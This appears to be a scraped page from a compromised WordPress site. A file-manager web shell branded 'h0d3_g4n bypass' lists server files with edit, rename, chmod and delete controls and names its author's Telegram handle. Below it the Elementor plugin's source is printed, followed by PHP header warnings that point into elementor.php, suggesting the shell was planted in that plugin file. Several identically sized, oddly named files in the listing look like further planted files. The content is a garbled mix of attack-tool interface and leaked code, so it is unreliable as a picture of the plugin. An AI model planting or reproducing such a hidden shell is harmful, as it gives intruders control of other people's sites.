h0d3_g4n bypass (Fixed Version)

NameTypeSizePermissionActions
libs Folder 0755 Edit | Rename | Chmod | Delete
001_blankpdf.pdf File 2.19 KB 0755 Edit | Rename | Chmod | Delete
002_twopagedoc.pdf File 2.59 KB 0755 Edit | Rename | Chmod | Delete
002_twopagedoc_oldapi.pdf File 2.59 KB 0755 Edit | Rename | Chmod | Delete
003_demolandscape.pdf File 2.26 KB 0755 Edit | Rename | Chmod | Delete
004_fontsizes.pdf File 2.34 KB 0755 Edit | Rename | Chmod | Delete
005_demofonttypes.pdf File 2.54 KB 0755 Edit | Rename | Chmod | Delete
006_demotestcolors.pdf File 2.55 KB 0755 Edit | Rename | Chmod | Delete
007_demometadata.pdf File 2.43 KB 0755 Edit | Rename | Chmod | Delete
008_demorectangles.pdf File 2.48 KB 0755 Edit | Rename | Chmod | Delete
009_demoliness.pdf File 2.52 KB 0755 Edit | Rename | Chmod | Delete
010_democircles.pdf File 2.81 KB 0755 Edit | Rename | Chmod | Delete
011_multilinetext.pdf File 2.36 KB 0755 Edit | Rename | Chmod | Delete
012_multiplelines.pdf File 2.6 KB 0755 Edit | Rename | Chmod | Delete
013_sillysvgrenderer.pdf File 5.07 KB 0755 Edit | Rename | Chmod | Delete
013_sillysvgrenderer.svg File 2.46 KB 0755 Edit | Rename | Chmod | Delete
014_addImage.jpeg File 7.74 KB 0755 Edit | Rename | Chmod | Delete
014_addImage.jpeg.base64.txt File 10.32 KB 0755 Edit | Rename | Chmod | Delete
014_addImage.pdf.base64.txt File 13.55 KB 0755 Edit | Rename | Chmod | Delete
014_addImage.txt File 13.55 KB 0755 Edit | Rename | Chmod | Delete
015_splittext.js File 2.44 KB 0755 Edit | Rename | Chmod | Delete
015_splittext.pdf File 6.1 KB 0755 Edit | Rename | Chmod | Delete
3d_exhibits1 File 9.03 KB 0755 Edit | Rename | Chmod | Delete
comment_reply File 9.03 KB 0755 Edit | Rename | Chmod | Delete
components_tests.js File 3.23 KB 0755 Edit | Rename | Chmod | Delete
imagelibrary File 9.03 KB 0755 Edit | Rename | Chmod | Delete
index.htm File 173 B 0755 Edit | Rename | Chmod | Delete
masterRegist File 9.03 KB 0755 Edit | Rename | Chmod | Delete
pdf_generate_tests.js File 9.84 KB 0755 Edit | Rename | Chmod | Delete
qtype_calculated File 9.03 KB 0755 Edit | Rename | Chmod | Delete
test.html File 1.17 KB 0755 Edit | Rename | Chmod | Delete
test_from_html_css_page_breaks.html File 1.77 KB 0755 Edit | Rename | Chmod | Delete
test_harness.js File 4.07 KB 0755 Edit | Rename | Chmod | Delete
test_min.html File 1.15 KB 0755 Edit | Rename | Chmod | Delete
usercp_register File 9.03 KB 0755 Edit | Rename | Chmod | Delete
� 2025 Coded By h0d3_g4n | Telegram: @h0d3_g4n
?> /** * Plugin Name: Elementor * Description: The Elementor Website Builder has it all: drag and drop page builder, Atomic Editor, pixel perfect design, global and reusable style systems, mobile responsive editing, and more. Get started now! * Plugin URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash * Version: 4.2.2 * Author: Elementor.com * Author URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=author-uri&utm_medium=wp-dash * Requires PHP: 7.4 * Requires at least: 6.8 * Text Domain: elementor * * @package Elementor * @category Core * * Elementor is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * any later version. * * Elementor is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } define( 'ELEMENTOR_VERSION', '4.2.2' ); define( 'ELEMENTOR_MINIMUM_WP_VERSION', '6.8' ); define( 'ELEMENTOR__FILE__', __FILE__ ); define( 'ELEMENTOR_PLUGIN_BASE', plugin_basename( ELEMENTOR__FILE__ ) ); define( 'ELEMENTOR_PATH', plugin_dir_path( ELEMENTOR__FILE__ ) ); if ( defined( 'ELEMENTOR_TESTS' ) && ELEMENTOR_TESTS ) { define( 'ELEMENTOR_URL', 'file://' . ELEMENTOR_PATH ); } else { define( 'ELEMENTOR_URL', plugins_url( '/', ELEMENTOR__FILE__ ) ); } define( 'ELEMENTOR_MODULES_PATH', plugin_dir_path( ELEMENTOR__FILE__ ) . '/modules' ); define( 'ELEMENTOR_ASSETS_PATH', ELEMENTOR_PATH . 'assets/' ); define( 'ELEMENTOR_ASSETS_URL', ELEMENTOR_URL . 'assets/' ); if ( ! defined( 'ELEMENTOR_EDITOR_EVENTS_MIXPANEL_TOKEN' ) ) { define( 'ELEMENTOR_EDITOR_EVENTS_MIXPANEL_TOKEN', '150605b3b9f979922f2ac5a52e2dcfe9' ); } if ( file_exists( ELEMENTOR_PATH . 'vendor/autoload.php' ) ) { require_once ELEMENTOR_PATH . 'vendor/autoload.php'; // We need this file because of the DI\create function that we are using. // Autoload classmap doesn't include this file. } $deprecation_func_file = ELEMENTOR_PATH . 'vendor_prefixed/twig/symfony/deprecation-contracts/function.php'; if ( file_exists( $deprecation_func_file ) ) { require_once $deprecation_func_file; if ( ! function_exists( 'trigger_deprecation' ) ) { function trigger_deprecation( string $package, string $version, string $message, ...$args ): void { \ElementorDeps\trigger_deprecation( $package, $version, $message, ...$args ); } } } if ( ! version_compare( PHP_VERSION, '7.4', '>=' ) ) { add_action( 'admin_notices', 'elementor_fail_php_version' ); } elseif ( ! version_compare( get_bloginfo( 'version' ), ELEMENTOR_MINIMUM_WP_VERSION, '>=' ) ) { add_action( 'admin_notices', 'elementor_fail_wp_version' ); } else { require ELEMENTOR_PATH . 'includes/plugin.php'; } /** * Elementor admin notice for minimum PHP version. * * Warning when the site doesn't have the minimum required PHP version. * * @since 1.0.0 * * @return void */ function elementor_fail_php_version() { $html_message = sprintf( '

%1$s

%2$s %3$s

', esc_html__( 'Elementor isn’t running because PHP is outdated.', 'elementor' ), sprintf( /* translators: %s: PHP version. */ esc_html__( 'Update to version %s and get back to creating!', 'elementor' ), '7.4' ), esc_html__( 'Show me how', 'elementor' ) ); echo wp_kses_post( $html_message ); } /** * Elementor admin notice for minimum WordPress version. * * Warning when the site doesn't have the minimum required WordPress version. * * @since 1.5.0 * * @return void */ function elementor_fail_wp_version() { $html_message = sprintf( '

%1$s

%2$s %3$s

', esc_html__( 'Elementor isn’t running because WordPress is outdated.', 'elementor' ), sprintf( /* translators: %s: WordPress version. */ esc_html__( 'Update to version %s and get back to creating!', 'elementor' ), ELEMENTOR_MINIMUM_WP_VERSION ), esc_html__( 'Show me how', 'elementor' ) ); echo wp_kses_post( $html_message ); }
Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/elementor/elementor.php:358) in /var/www/html/wp-includes/pluggable.php on line 1531

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/elementor/elementor.php:358) in /var/www/html/wp-includes/pluggable.php on line 1534